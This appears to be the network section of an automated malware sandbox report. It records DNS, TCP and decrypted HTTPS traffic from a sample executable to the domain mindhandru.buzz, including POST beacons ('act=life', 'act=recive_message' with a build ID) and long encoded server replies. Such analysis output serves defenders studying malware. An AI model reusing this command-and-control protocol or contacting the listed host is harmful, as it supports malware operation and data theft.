                                                                                                                  Dec 27, 2024 08:56:44.526201010 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:44.526222944 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:44.526521921 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:44.576348066 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:44.607434988 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:44.607657909 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:44.607932091 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:45.229995966 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:45.230092049 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:45.230259895 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:45.234962940 CET49699443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:45.234993935 CET44349699172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:45.246278048 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:45.246351957 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:45.246445894 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:45.246809006 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:45.246824026 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:46.514209986 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:46.514353991 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:46.515829086 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:46.515850067 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:46.516099930 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:46.517344952 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:46.517383099 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:46.517493963 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295258999 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295320988 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295346022 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295367002 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.295389891 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295418978 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295433044 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.295439959 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.295480013 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.303458929 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.311970949 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.312015057 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.312024117 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.320317984 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.320357084 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.320368052 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.373260021 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.414796114 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.467116117 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.496445894 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500228882 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500267982 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500313997 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.500329971 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500359058 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500376940 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.500411987 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.500616074 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.500632048 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.500658035 CET49700443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.500663042 CET44349700172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.833127975 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.833180904 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:47.833259106 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.833604097 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:47.833614111 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:49.147912979 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:49.148046017 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:49.149769068 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:49.149781942 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:49.149997950 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:49.151572943 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:49.151719093 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:49.151736975 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:50.075989962 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:50.076085091 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:50.076153994 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:50.076584101 CET49701443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:50.076603889 CET44349701172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:50.177352905 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:50.177406073 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:50.177486897 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:50.177864075 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:50.177876949 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:51.390312910 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:51.390511990 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:51.391959906 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:51.391973019 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:51.392210960 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:51.393467903 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:51.393663883 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:51.393688917 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:51.393779039 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:51.439338923 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:52.194195032 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:52.194274902 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:52.194405079 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:52.194623947 CET49703443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:52.194643021 CET44349703172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:52.421499014 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:52.421535969 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:52.421627998 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:52.422379971 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:52.422394991 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:53.681320906 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:53.681437016 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:53.683274031 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:53.683279037 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:53.683478117 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:53.684829950 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:53.685019016 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:53.685041904 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:53.685096979 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:53.685103893 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:54.619220018 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:54.619307995 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:54.619385958 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:54.619673967 CET49709443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:54.619697094 CET44349709172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:55.238492012 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:55.238544941 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:55.238639116 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:55.238987923 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:55.239001989 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:56.621576071 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:56.621880054 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:56.623394966 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:56.623403072 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:56.623627901 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:56.625008106 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:56.625135899 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:56.625140905 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:57.398385048 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:57.398467064 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:57.398519993 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:57.398664951 CET49715443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:57.398682117 CET44349715172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:57.934911966 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:57.934947014 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:57.935018063 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:57.935398102 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:57.935409069 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.258013010 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.258102894 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.259875059 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.259886980 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.260112047 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.261590958 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262480974 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262506008 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.262607098 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262629986 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.262792110 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262813091 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263077021 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263093948 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263257027 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263274908 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263427019 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263443947 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263456106 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263465881 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263606071 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263624907 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263645887 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263804913 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263824940 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.311336994 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.313920975 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.313955069 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.313991070 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314013958 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.314038992 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314049006 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.314060926 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314066887 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740326881 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740427971 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740520000 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.760615110 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.760633945 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.772912979 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.772969007 CET44349736172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.773077011 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.773581028 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.773601055 CET44349736172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:03.029746056 CET49736443192.168.2.7172.67.165.185

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 27, 2024 08:56:43.068430901 CET5988253192.168.2.71.1.1.1
                                                                                                                  Dec 27, 2024 08:56:43.206702948 CET53598821.1.1.1192.168.2.7

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 27, 2024 08:56:43.068430901 CET192.168.2.71.1.1.10xce84Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 27, 2024 08:56:43.206702948 CET1.1.1.1192.168.2.70xce84No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                                  Dec 27, 2024 08:56:43.206702948 CET1.1.1.1192.168.2.70xce84No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • mindhandru.buzz

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.749699172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:44 UTC262OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 8
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                  Data Ascii: act=life
                                                                                                                  2024-12-27 07:56:45 UTC1126INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=kg1v9b87niu4blngcojrhm18rs; expires=Tue, 22 Apr 2025 01:43:24 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a5RQL6LhYV2gosjQUFqSE1SSOM3aAtaGDzhyqf3kXLbJKiVIcvIWwkX%2F1MTVg2W57qeItY61g0eBr9LjFKnPDjc9cvSIWMOhIdhrddYRMW19jOGb5nhZTLrQD%2F%2BDTtFvnY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c17bfe3542aa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=29823&min_rtt=1780&rtt_var=17387&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1640449&cwnd=201&unsent_bytes=0&cid=6686b199cbe7ba2c&ts=720&x=0"
                                                                                                                  2024-12-27 07:56:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                  Data Ascii: 2ok
                                                                                                                  2024-12-27 07:56:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.749700172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 47
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:46 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                  2024-12-27 07:56:47 UTC1128INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=303dvepgd5dqulc09gdodcmfrj; expires=Tue, 22 Apr 2025 01:43:26 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PmbkCfuZSqwubJPPX9KO7LG6QzK0KbMmxjPfnr%2B%2F79vjc2lbZHDa6bBUCKtp8CdoMntV%2BYVHAJr9NsrCpDXTJBzRy7Ro%2FIuAN%2FGgrDMYdAIIr0YtWCOcTy9M2L3LV%2FtEAo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c1888bea42fe-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1569&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1720683&cwnd=69&unsent_bytes=0&cid=993240005c1f1b7b&ts=787&x=0"
                                                                                                                  2024-12-27 07:56:47 UTC241INData Raw: 63 34 35 0d 0a 69 52 67 4f 71 78 38 72 52 2b 4c 4b 64 62 74 78 36 4e 68 53 39 44 63 4c 36 65 75 34 69 61 33 63 4f 32 76 4d 74 55 4b 56 6b 32 6a 79 4f 6e 69 4a 4a 52 39 72 77 4c 6b 51 6d 55 75 63 71 69 65 52 47 79 6d 49 6a 35 71 7a 79 37 31 58 47 4b 6d 5a 59 4f 50 2b 53 72 4e 2b 62 38 64 73 54 6d 76 41 72 77 32 5a 53 37 4f 6a 63 4a 46 5a 4b 64 50 4a 33 65 50 50 76 56 63 4a 72 64 34 74 35 66 38 4c 34 58 52 70 77 33 70 49 49 34 4f 6d 47 4e 34 55 6a 62 6b 34 6d 6c 35 6d 67 59 61 61 70 59 2b 35 51 55 6e 32 6c 77 2f 77 35 77 6e 45 65 58 33 41 50 56 5a 72 6d 65 67 51 31 56 50 53 2b 6a 4f 52 56 57 65 50 6a 39 50 68 78 62 52 66 43 4b 6a 66 4d 76 7a 31 41 4f 46 36 61 73 4a 77 51 54 65 4f 72 42 2f 56 45 6f 65 35 63 4e 67 56
                                                                                                                  Data Ascii: c45iRgOqx8rR+LKdbtx6NhS9DcL6eu4ia3cO2vMtUKVk2jyOniJJR9rwLkQmUucqieRGymIj5qzy71XGKmZYOP+SrN+b8dsTmvArw2ZS7OjcJFZKdPJ3ePPvVcJrd4t5f8L4XRpw3pII4OmGN4Ujbk4ml5mgYaapY+5QUn2lw/w5wnEeX3APVZrmegQ1VPS+jORVWePj9PhxbRfCKjfMvz1AOF6asJwQTeOrB/VEoe5cNgV
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 62 70 50 4a 67 71 75 63 6a 46 6f 59 76 38 49 74 35 2f 64 4b 39 44 52 31 69 58 70 46 5a 64 6a 6f 48 39 55 64 6a 37 6b 2f 6b 56 52 70 6d 59 62 61 36 4d 65 32 58 51 4f 68 32 43 2f 35 2b 77 33 6a 63 32 76 47 65 6b 45 6a 6a 36 74 58 6c 31 4f 4e 6f 6e 44 4f 46 55 6d 62 69 74 6e 2f 77 71 38 5a 46 75 44 4f 59 50 44 39 53 72 4d 36 61 73 64 38 52 43 57 53 6f 42 7a 53 46 70 69 78 4f 5a 74 59 61 59 61 44 31 65 6a 50 75 56 4d 44 6f 64 30 6b 2b 76 77 4d 36 33 6f 73 68 7a 31 4f 50 63 44 77 56 2f 6f 57 6d 72 30 38 67 42 64 54 79 35 61 55 38 6f 2b 35 56 55 6e 32 6c 79 6a 79 38 67 6e 67 64 57 2f 42 64 6c 73 6c 6b 71 34 61 33 41 47 4d 76 7a 36 63 56 6e 75 42 68 39 7a 6f 78 72 56 51 44 4b 6e 54 59 4c 6d 78 44 66 4d 36 4e 49 6c 63 52 43 36 4d 6f 67 44 5a 55 35 58 30 4b 64 5a
                                                                                                                  Data Ascii: bpPJgqucjFoYv8It5/dK9DR1iXpFZdjoH9Udj7k/kVRpmYba6Me2XQOh2C/5+w3jc2vGekEjj6tXl1ONonDOFUmbitn/wq8ZFuDOYPD9SrM6asd8RCWSoBzSFpixOZtYaYaD1ejPuVMDod0k+vwM63oshz1OPcDwV/oWmr08gBdTy5aU8o+5VUn2lyjy8gngdW/Bdlslkq4a3AGMvz6cVnuBh9zoxrVQDKnTYLmxDfM6NIlcRC6MogDZU5X0KdZ
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 39 7a 6b 77 72 49 5a 52 2b 37 51 4f 4c 65 70 53 73 46 35 65 4d 70 33 43 78 43 44 70 68 6e 65 42 63 71 6c 66 6f 38 56 62 6f 66 4a 67 71 76 43 76 31 45 50 76 4e 67 74 39 50 38 45 35 48 39 6a 77 58 31 4a 4b 49 57 73 48 4e 49 51 68 37 34 69 6e 46 56 68 6a 6f 6a 51 34 59 2f 77 47 51 36 32 6c 33 69 33 77 42 33 67 4f 46 6e 4b 63 30 63 69 6c 75 67 49 6c 77 72 4b 76 54 7a 57 44 53 6d 47 67 64 2f 75 77 4c 39 54 42 36 76 64 4c 50 2f 2f 43 66 6c 31 61 4d 6c 78 51 53 2b 4e 70 68 50 52 47 6f 47 78 4e 70 5a 55 59 38 76 48 6d 75 7a 58 2f 67 46 4a 6d 74 41 73 2b 76 35 49 33 6e 6c 69 78 33 70 66 5a 5a 2f 6d 44 70 6b 55 68 76 70 6f 31 6c 6c 67 69 34 4c 51 37 38 2b 35 56 41 79 74 30 43 50 36 39 67 44 6c 66 57 6a 46 64 45 51 6a 67 4b 38 54 33 41 47 50 73 7a 79 61 46 53 66 4c
                                                                                                                  Data Ascii: 9zkwrIZR+7QOLepSsF5eMp3CxCDphneBcqlfo8VbofJgqvCv1EPvNgt9P8E5H9jwX1JKIWsHNIQh74inFVhjojQ4Y/wGQ62l3i3wB3gOFnKc0cilugIlwrKvTzWDSmGgd/uwL9TB6vdLP//Cfl1aMlxQS+NphPRGoGxNpZUY8vHmuzX/gFJmtAs+v5I3nlix3pfZZ/mDpkUhvpo1llgi4LQ78+5VAyt0CP69gDlfWjFdEQjgK8T3AGPszyaFSfL
